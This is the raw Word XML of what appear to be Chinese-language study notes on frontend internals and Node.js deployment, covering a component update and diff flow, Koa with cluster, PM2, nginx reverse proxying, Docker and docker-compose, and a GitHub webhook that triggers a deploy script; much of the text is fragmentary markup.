        <w:t>compareTwoVnodes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forceUpdate(callback)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实际更新组件的函数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{ $updater, $cache, props, state, context } = this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(!$cache.isMounted)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($updater.isPending)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$updater.addState(state)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nextProps = $cache.props || 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nextState = $cache.state || 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nextContext = $cache.context || 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parentContext = $cache.parentContext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node = $cache.node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vnode = $cache.vnode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缓存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$cache.props = $cache.state = $cache.context = null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$updater.isPending = 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(this.componentWillUpdate)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this.componentWillUpdate(nextProps, nextState, nextContext)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this.state = nextState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this.props = nextProps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this.context = nextContext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下面才是重点  对比vnode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let newVnode = renderComponent(this)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//diff算法对比前后两个虚拟dom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let newNode = compareTwoVnodes(vnode, newVnode, node, getChildContext(this, parentContext))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(newNode !== node)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newNode.cache = newNode.cache ||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syncCache(newNode.cache, node.cache, newNode)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$cache.vnode = newVnode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$cache.node = newNode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清除pending 执行didmount生命周期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clearPending()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(this.componentDidUpdate)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this.componentDidUpdate(props, state, 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callback.call(this)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$updater.isPending =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$updater.emitUpdate()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更新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6.compareTwoVnodes就是diff算法的体现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function compareTwoVnodes(vnode, newVnode, node, parentContext)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let newNode = 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(newVnode == null)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remove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destroyVnode(vnode, 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node.parentNode.removeChild(node)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(vnode.type !== newVnode.type || vnode.key !== newVnode.key)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replace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destroyVnode(vnode, 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 = initVnode(newVnode, parentContext)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node.parentNode.replaceChild(newNode, node)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else if (vnode !== newVnode || parentContext)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same type and same key -&gt; update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newNode = updateVnode(vnode, newVnode, node, parentContext)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newNode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执行过程，先把state放到更新队列，如果发现更新队列不在更新就触发更新函数，更新函数拍平所有state（多次更新合并为一次），然后调用shouldComponentUpdate判断是否需要更新，如果更新了就执行强制更新，取出前后两个虚拟dom 通过 diff算法比较更新真实dom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登录服务器：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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部署关心的几个问题：故障恢复，多核利用，端口共享，node解决上面的问题一般是用cluster模块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//app.js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Koa = require('koa');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创建一个Koa对象表示web app本身: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app = new Koa();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对于任何请求，app将调用该异步函数处理请求：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app.use(async (ctx, next) =&gt;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console.log('ctx....')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随机产生错误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default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Math.random() &gt; 0.9 ?  aaa() : '2'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await next();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ctx.response.type = 'text/html';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ctx.response.body = '&lt;h1&gt;Hello, koa2!&lt;/h1&gt;';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(!module.parent)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app.listen(3000);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console.log('app started at port 3000...');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module.exports = app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//Cluster.js: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cluster = require('cluster');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os = require('os'); // 获取CPU 的数量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numCPUs = os.cpus().length;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process = require('process')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console.log('numCPUs:', numCPUs)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workers = {};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(cluster.isMaster) {// 主进程分支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当一个工作进程结束时，重启工作进程 delete workers[worker.pid];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cluster.on('death', function (worker)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 = cluster.fork();//重新开启一个线程，其实也是重新执行cluster.js 但是会走else分支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workers[worker.pid] = worker;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初始开启与CPU 数量相同的工作进程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(var i = 0; i &lt; numCPUs; i++)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worker = cluster.fork();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workers[worker.pid] = worker;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工作进程分支，启动服务器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app = require('./app');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app.use(async (ctx, next)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console.log('worker' + cluster.worker.id + ',PID:' + process.pid)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app.listen(3000);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当主进程被终止时，关闭所有工作进程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process.on('SIGTERM', function ()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(var pid in workers)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process.kill(pid);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process.exit(0);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启动：node cluster.js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scp上传文件：上传到根目录</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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test.js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"mailto:root@47.98.252.43:/root/"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root@47.98.252.43:/root/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（把多次命令编写成一个shell脚本）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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通过Git命令拉取</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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可视化工具filezilla 客户端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安装：npm install -g pm2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 start app.js --watch -i 2 //-watch 监听文件变化，-i 启动多少个实例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Pm2 stop all/pm2 stop [name]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Pm2 list  //查看运行的实例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配置文件方式：新建文件process.yml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 script : app.js  //启动脚本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instances: 2 //监听的实例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  : true //监听文件变化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env    :   //evn传参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NODE_ENV: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执行方式：pm2 start process.yml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有两个主要功能</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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静态服务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指向前端打包的dist目录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35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前端的接口请求/api/*** 会请求到nginx的80端口，nginx通过反向代理开头把api的开头的接口指向到对应的node服务器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="105" w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="3359785"/>
            <wp:effectExtent l="0" t="0" r="6350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105" w:leftChars="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35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配置ngiux </w:t>
      </w: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进入目录：/etc/nginx/sites-enabled  //sites-enabled是放置网站的根目录</w:t>
      </w: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  <w:r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# /etc/nginx/sites-enable/taro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 Vi </w:t>
      </w:r>
      <w:r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taro </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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  <w:t xml:space="preserve"> 输入下面的</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="AA5500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server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listen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="116644"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>80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server_name taro.josephxia.com;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//这个域名下面才会走下面的规则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location / {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root /root/source/taro-node/dist;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//网站根目录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index index.html index.htm;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//启动页面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location ~ \.(gif|jpg|png)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//图片的单独配置</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:ind w:firstLine="190" w:firstLineChars="10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root /root/source/taro-node/server/static;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location /api { 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//代理接口，代理到3000接口下面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proxy_pass http://127.0.0.1:3000;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proxy_redirect off;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Host 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$host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X-Real-IP </w:t>
      </w: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$remote_addr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proxy_set_header X-Forwarded-For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0000FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>$proxy_add_x_forwarded_for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ind w:left="105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操作系统层面的桌面虚拟化技术，隔离系统差异，提供一直的运行环境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例子：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80:80 -v $PWD/WWW:/usr/share/nginx/html nginx -d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384" w:hanging="380" w:hangingChars="20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运行docker 镜像，内部端口80映射外部端口80，当前目录www映射/usr/share/nginx/html -d代表在后台运行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ps -a // 查看运行的容器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stop id //停止容器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docker的三个核心概念：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仓库，镜像，容器，在仓库中存放镜像，如果在运行中没有安装镜像的话，就从仓库里面拉取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镜像在运行中的实例我们就叫做容器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ind w:left="105" w:leftChars="0" w:firstLine="0" w:firstLine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建立自己的nginx镜像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新建文件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#Dockerfile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FROM nginx:latest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RUN echo '&lt;h1&gt;Hello, Kaikeba!&lt;/h1&gt;' &gt; /usr/share/nginx/html/index.html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buid -t mynginx .  //会读取dockerfile建立自己的镜像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80:80 -d mynginx //运行镜像 访问localhost就可以访问页面了</w:t>
      </w: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 w:firstLine="210" w:firstLineChars="10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建立自己的node镜像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新建文件dockerfile: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#Dockerfile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#制定node镜像的版本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node:10-alpine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#移动当前目录下面的文件到app目录下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.  /app/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#进入到容器app目录下面，类似cd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WORKDIR /app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#安装依赖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npm install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#对外暴露的端口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 3000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#程序启动脚本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["node", "app.js"]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build -t mynode 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 run -p 3000:3000-d mynode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建立自己的pm2镜像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新建文件dockerfile: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# Dockerfile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FROM keymetrics/pm2:latest-alpine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WORKDIR /usr/src/app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ADD . /usr/src/app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RUN npm config set registry https://registry.npm.taobao.org/ &amp;&amp; \    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 xml:space="preserve">    npm i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EXPOSE 3000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#pm2在docker中使用命令为pm2-docker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CMD ["pm2-runtime", "start", "process.yml"]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新建文件夹process.yml：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script : app.js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instances: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watch  : true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env    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NODE_ENV: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05" w:leftChars="0"/>
        <w:jc w:val="left"/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</w:pP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在当前</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="Lucida Console" w:cs="Lucida Console"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>目录下面运行：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 build -t mypm2 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Docker run -p 3000:3000 -d mypm2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建立统一的docker-compose.yml文件：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version: '3.1'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app-pm2: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container_name: app-pm2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#构建容器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 寻找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>./backend</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件夹下面的dockerfile 只吃了个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build: ./backend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需要链接本地代码时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volumes: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#   - ./backend:/usr/src/app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ports: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 "3000:3000"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mongo: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image: mongo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restart: always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- 27017:27017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nginx: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restart: always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image: nginx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ports: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- 8091:80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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 本地代码映射到docker容器内部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volumes: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./nginx/conf.d/:/etc/nginx/conf.d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./frontend/dist/:/var/www/html/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- ./static/:/static/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6"/>
        </w:numPr>
        <w:ind w:left="10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git提交代码就执行发布：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在git网站上配置webhook，git push触发提交，触发配置的接口，接口在执行对应的shell脚本：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Deploy Project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docker-compose up -d --force-recreate --build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获取最新版代码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pull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强制重新编译容器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down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docker-compose up -d --force-recreate --build</w:t>
      </w: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05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//Webhook.js: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http = require('http')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createHandler = require('github-webhook-handler')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handler = createHandler({ path: '/webhooks', secret: 'myHashSecret'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上面的 secret 保持和 GitHub 后台设置的一致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run_cmd(cmd, args, callback)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spawn = require('child_process').spawn;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child = spawn(cmd, args);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var resp = "";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child.stdout.on('data', function (buffer) { resp += buffer.toString();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child.stdout.on('end', function () { callback(resp)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http.createServer(function (req, res)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handler(req, res, function (err)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res.statusCode = 404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res.end('no such location')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}).listen(7777,() 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console.log('WebHooks Listern at 7777');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handler.on('error', function (err)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console.error('Error:', err.message)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//git会触发这个接口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handler.on('push', function (event)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console.log('Received a push event for %s to %s',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event.payload.repository.name,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event.payload.ref);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分支判断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if(event.payload.ref === 'refs/heads/master'){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console.log('deploy master..')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//执行这个shell命令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run_cmd('sh', ['./deploy-dev.sh'], function(text){ console.log(text)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CDB47"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="813CDB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1E500C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B1E50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2183D88"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="92183D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243C8BA"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A243C8BA"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="404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258799A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A25879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6968A19"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="A6968A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AEACFD8D"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="AEACFD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5511F7C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B5511F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B93D750E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B93D7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CA2B7F8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCA2B7F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0">
    <w:nsid w:val="BCC57B4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BCC57B4F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C10A590F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C10A590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C4AFF16C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C4AFF1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C74BAA5F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C74BAA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C98AB586"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="C98AB5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CC93B471"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC93B4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D4C91330"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D4C913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D6A27C04"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D6A27C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D7AC5AD8"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="D7AC5A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BEDB694"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DBEDB6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DFBC17AE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="DFBC17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E82D16D4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="E82D16D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22">
    <w:nsid w:val="F26E1112"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F26E1112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FF1A50D4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FF1A50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03A30700"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="03A307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04AB93F2"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="04AB93F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07078D16"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="07078D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0E3345AD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="0E3345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14C845EF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="14C845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2C95D2FF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2C95D2F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30">
    <w:nsid w:val="35622812"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="35622812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31">
    <w:nsid w:val="3BE92566"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="3BE92566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46A28FF1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="46A28FF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33">
    <w:nsid w:val="478B125E"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="478B12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559469EE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="559469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72DF83E1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="72DF83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11"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="30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145E"/>
    <w:rsid w:val="00B95A7B"/>
    <w:rsid w:val="00D012F2"/>
    <w:rsid w:val="00E370A1"/>
    <w:rsid w:val="01770629"/>
    <w:rsid w:val="01FC4A71"/>
    <w:rsid w:val="028806EA"/>
    <w:rsid w:val="02F6415B"/>
    <w:rsid w:val="03560C95"/>
    <w:rsid w:val="03780712"/>
    <w:rsid w:val="037F1BD1"/>
    <w:rsid w:val="0404171D"/>
    <w:rsid w:val="042B63CE"/>
    <w:rsid w:val="04346DC2"/>
    <w:rsid w:val="0459782F"/>
    <w:rsid w:val="047264FE"/>
    <w:rsid w:val="04796082"/>
    <w:rsid w:val="047E1E5B"/>
    <w:rsid w:val="0485337A"/>
    <w:rsid w:val="04994722"/>
    <w:rsid w:val="04A02D41"/>
    <w:rsid w:val="04A02D9E"/>
    <w:rsid w:val="04D640E4"/>
    <w:rsid w:val="050B5C71"/>
    <w:rsid w:val="051350FC"/>
    <w:rsid w:val="05656E4E"/>
    <w:rsid w:val="05D10E73"/>
    <w:rsid w:val="060C14DE"/>
    <w:rsid w:val="06504CA5"/>
    <w:rsid w:val="06523406"/>
    <w:rsid w:val="067D5853"/>
    <w:rsid w:val="0686363B"/>
    <w:rsid w:val="06AC6BF2"/>
    <w:rsid w:val="06C60BEE"/>
    <w:rsid w:val="06DB15E0"/>
    <w:rsid w:val="071B6CB9"/>
    <w:rsid w:val="078430CB"/>
    <w:rsid w:val="078A0CCF"/>
    <w:rsid w:val="07CA6E2C"/>
    <w:rsid w:val="07CD73F0"/>
    <w:rsid w:val="07D7050B"/>
    <w:rsid w:val="07EB4C93"/>
    <w:rsid w:val="07EF24EF"/>
    <w:rsid w:val="07FA24FC"/>
    <w:rsid w:val="082E6F6B"/>
    <w:rsid w:val="08420874"/>
    <w:rsid w:val="08A37D09"/>
    <w:rsid w:val="08B20DF3"/>
    <w:rsid w:val="08C4511B"/>
    <w:rsid w:val="08DB36A8"/>
    <w:rsid w:val="094C7FF0"/>
    <w:rsid w:val="09551090"/>
    <w:rsid w:val="099719DD"/>
    <w:rsid w:val="099F3845"/>
    <w:rsid w:val="09A459AE"/>
    <w:rsid w:val="09B809FA"/>
    <w:rsid w:val="09D57D76"/>
    <w:rsid w:val="0A014D49"/>
    <w:rsid w:val="0A055CC2"/>
    <w:rsid w:val="0A22408A"/>
    <w:rsid w:val="0A750524"/>
    <w:rsid w:val="0A8A5781"/>
    <w:rsid w:val="0AA54374"/>
    <w:rsid w:val="0AA55162"/>
    <w:rsid w:val="0ACA31FB"/>
    <w:rsid w:val="0AED7246"/>
    <w:rsid w:val="0B353378"/>
    <w:rsid w:val="0B8311F7"/>
    <w:rsid w:val="0BDA7CBC"/>
    <w:rsid w:val="0BE5006A"/>
    <w:rsid w:val="0C424F57"/>
    <w:rsid w:val="0C537C10"/>
    <w:rsid w:val="0C785E18"/>
    <w:rsid w:val="0C893B9D"/>
    <w:rsid w:val="0C993932"/>
    <w:rsid w:val="0CCD0A40"/>
    <w:rsid w:val="0D267961"/>
    <w:rsid w:val="0D4B6D19"/>
    <w:rsid w:val="0D79103F"/>
    <w:rsid w:val="0D7D3B17"/>
    <w:rsid w:val="0DA50F1D"/>
    <w:rsid w:val="0DC25660"/>
    <w:rsid w:val="0E2E027A"/>
    <w:rsid w:val="0E453BE0"/>
    <w:rsid w:val="0E85281D"/>
    <w:rsid w:val="0EA51486"/>
    <w:rsid w:val="0EC1473C"/>
    <w:rsid w:val="0EC80C9F"/>
    <w:rsid w:val="0F2111EE"/>
    <w:rsid w:val="0F2B05FD"/>
    <w:rsid w:val="0FBE5A45"/>
    <w:rsid w:val="1035305A"/>
    <w:rsid w:val="1090315D"/>
    <w:rsid w:val="10C423D7"/>
    <w:rsid w:val="10D81775"/>
    <w:rsid w:val="10EB4F05"/>
    <w:rsid w:val="111174B3"/>
    <w:rsid w:val="112F4612"/>
    <w:rsid w:val="1140229B"/>
    <w:rsid w:val="115A16CB"/>
    <w:rsid w:val="115C4459"/>
    <w:rsid w:val="122F519B"/>
    <w:rsid w:val="12671E5E"/>
    <w:rsid w:val="131823AE"/>
    <w:rsid w:val="132B1CE1"/>
    <w:rsid w:val="135905D5"/>
    <w:rsid w:val="13842D0B"/>
    <w:rsid w:val="138600B5"/>
    <w:rsid w:val="139F267F"/>
    <w:rsid w:val="140A5B0B"/>
    <w:rsid w:val="14375687"/>
    <w:rsid w:val="14626610"/>
    <w:rsid w:val="14791CC0"/>
    <w:rsid w:val="149E11B5"/>
    <w:rsid w:val="150216F4"/>
    <w:rsid w:val="151B6CD1"/>
    <w:rsid w:val="15647C4D"/>
    <w:rsid w:val="156B1A19"/>
    <w:rsid w:val="15F07543"/>
    <w:rsid w:val="164D078F"/>
    <w:rsid w:val="165B6991"/>
    <w:rsid w:val="1671315C"/>
    <w:rsid w:val="16943222"/>
    <w:rsid w:val="169819C2"/>
    <w:rsid w:val="16CB5B83"/>
    <w:rsid w:val="171555A1"/>
    <w:rsid w:val="17DC7752"/>
    <w:rsid w:val="1802327A"/>
    <w:rsid w:val="1814625B"/>
    <w:rsid w:val="18182AA5"/>
    <w:rsid w:val="182E17ED"/>
    <w:rsid w:val="19353502"/>
    <w:rsid w:val="19D22192"/>
    <w:rsid w:val="19E046CD"/>
    <w:rsid w:val="19F245A5"/>
    <w:rsid w:val="19F53E85"/>
    <w:rsid w:val="19FE4B58"/>
    <w:rsid w:val="1A5A1911"/>
    <w:rsid w:val="1A643A1D"/>
    <w:rsid w:val="1A876643"/>
    <w:rsid w:val="1A891191"/>
    <w:rsid w:val="1AA95ED9"/>
    <w:rsid w:val="1B0F2D8D"/>
    <w:rsid w:val="1B4A1ABE"/>
    <w:rsid w:val="1B762505"/>
    <w:rsid w:val="1B940A42"/>
    <w:rsid w:val="1B9F5AEE"/>
    <w:rsid w:val="1BDC3753"/>
    <w:rsid w:val="1BE51E29"/>
    <w:rsid w:val="1C17246C"/>
    <w:rsid w:val="1C175DC1"/>
    <w:rsid w:val="1C583066"/>
    <w:rsid w:val="1C5B7D4F"/>
    <w:rsid w:val="1C686C52"/>
    <w:rsid w:val="1C7714F9"/>
    <w:rsid w:val="1C782618"/>
    <w:rsid w:val="1C861AB6"/>
    <w:rsid w:val="1CBF5BC5"/>
    <w:rsid w:val="1DF46572"/>
    <w:rsid w:val="1E304FB3"/>
    <w:rsid w:val="1E8C1014"/>
    <w:rsid w:val="1EB9339E"/>
    <w:rsid w:val="1EC20C43"/>
    <w:rsid w:val="1EC57313"/>
    <w:rsid w:val="1EE61BB0"/>
    <w:rsid w:val="1F280D67"/>
    <w:rsid w:val="1F4F74F5"/>
    <w:rsid w:val="1F610C99"/>
    <w:rsid w:val="1F722F32"/>
    <w:rsid w:val="1F8C61B1"/>
    <w:rsid w:val="1FD97481"/>
    <w:rsid w:val="1FE94558"/>
    <w:rsid w:val="200A74C1"/>
    <w:rsid w:val="203C37A9"/>
    <w:rsid w:val="20511202"/>
    <w:rsid w:val="2066397E"/>
    <w:rsid w:val="208E0464"/>
    <w:rsid w:val="20B1060D"/>
    <w:rsid w:val="20FC1B64"/>
    <w:rsid w:val="20FD64D0"/>
    <w:rsid w:val="20FE0792"/>
    <w:rsid w:val="21476C32"/>
    <w:rsid w:val="217C6E6A"/>
    <w:rsid w:val="21901CE9"/>
    <w:rsid w:val="21947477"/>
    <w:rsid w:val="219A27F1"/>
    <w:rsid w:val="22261E41"/>
    <w:rsid w:val="22B21BEE"/>
    <w:rsid w:val="22ED7CF9"/>
    <w:rsid w:val="22F9754B"/>
    <w:rsid w:val="22FF7C49"/>
    <w:rsid w:val="23196B4F"/>
    <w:rsid w:val="234A6E18"/>
    <w:rsid w:val="23A403C7"/>
    <w:rsid w:val="23A51CDF"/>
    <w:rsid w:val="23C97D99"/>
    <w:rsid w:val="23CF37AD"/>
    <w:rsid w:val="23DA1028"/>
    <w:rsid w:val="23ED6E83"/>
    <w:rsid w:val="23FB5378"/>
    <w:rsid w:val="247468C2"/>
    <w:rsid w:val="24893210"/>
    <w:rsid w:val="24AF4088"/>
    <w:rsid w:val="24D76C5E"/>
    <w:rsid w:val="24DF5CD7"/>
    <w:rsid w:val="250A6819"/>
    <w:rsid w:val="255C6FA8"/>
    <w:rsid w:val="256A7F1E"/>
    <w:rsid w:val="257E7011"/>
    <w:rsid w:val="25DA2034"/>
    <w:rsid w:val="25F372B0"/>
    <w:rsid w:val="26263AB9"/>
    <w:rsid w:val="26541D73"/>
    <w:rsid w:val="265469EF"/>
    <w:rsid w:val="265C3DBC"/>
    <w:rsid w:val="26874758"/>
    <w:rsid w:val="26A97FE4"/>
    <w:rsid w:val="26C73664"/>
    <w:rsid w:val="26CF3ED2"/>
    <w:rsid w:val="26F94A87"/>
    <w:rsid w:val="270D2FE7"/>
    <w:rsid w:val="274C0264"/>
    <w:rsid w:val="27642ED4"/>
    <w:rsid w:val="2769263A"/>
    <w:rsid w:val="278A0823"/>
    <w:rsid w:val="283D74B2"/>
    <w:rsid w:val="28F84192"/>
    <w:rsid w:val="290125E8"/>
    <w:rsid w:val="2936547A"/>
    <w:rsid w:val="2958749E"/>
    <w:rsid w:val="297450E7"/>
    <w:rsid w:val="29FF2BD2"/>
    <w:rsid w:val="2A07534B"/>
    <w:rsid w:val="2A1522DA"/>
    <w:rsid w:val="2A9E03E5"/>
    <w:rsid w:val="2AB213B9"/>
    <w:rsid w:val="2B013B07"/>
    <w:rsid w:val="2B055A23"/>
    <w:rsid w:val="2B0D1EFF"/>
    <w:rsid w:val="2B34305F"/>
    <w:rsid w:val="2BB62FE0"/>
    <w:rsid w:val="2BBE2B17"/>
    <w:rsid w:val="2C583DD4"/>
    <w:rsid w:val="2CDF6C2A"/>
    <w:rsid w:val="2CE83006"/>
    <w:rsid w:val="2D0E0AE3"/>
    <w:rsid w:val="2D2B030F"/>
    <w:rsid w:val="2D4575BA"/>
    <w:rsid w:val="2D86432C"/>
    <w:rsid w:val="2D8A29E1"/>
    <w:rsid w:val="2DD627A3"/>
    <w:rsid w:val="2DE652F5"/>
    <w:rsid w:val="2E133A9B"/>
    <w:rsid w:val="2E3A4882"/>
    <w:rsid w:val="2EF9793E"/>
    <w:rsid w:val="2F0A4741"/>
    <w:rsid w:val="2F2818BC"/>
    <w:rsid w:val="2F406BF2"/>
    <w:rsid w:val="2F5A6D3E"/>
    <w:rsid w:val="2F5B2CC0"/>
    <w:rsid w:val="301648C9"/>
    <w:rsid w:val="301B2950"/>
    <w:rsid w:val="3032219E"/>
    <w:rsid w:val="30354A74"/>
    <w:rsid w:val="30C25BE0"/>
    <w:rsid w:val="313A0F5F"/>
    <w:rsid w:val="317B4F83"/>
    <w:rsid w:val="32030E76"/>
    <w:rsid w:val="320764E2"/>
    <w:rsid w:val="320C1572"/>
    <w:rsid w:val="3235069F"/>
    <w:rsid w:val="328F1B78"/>
    <w:rsid w:val="329F47AE"/>
    <w:rsid w:val="32E87F0C"/>
    <w:rsid w:val="33AC6410"/>
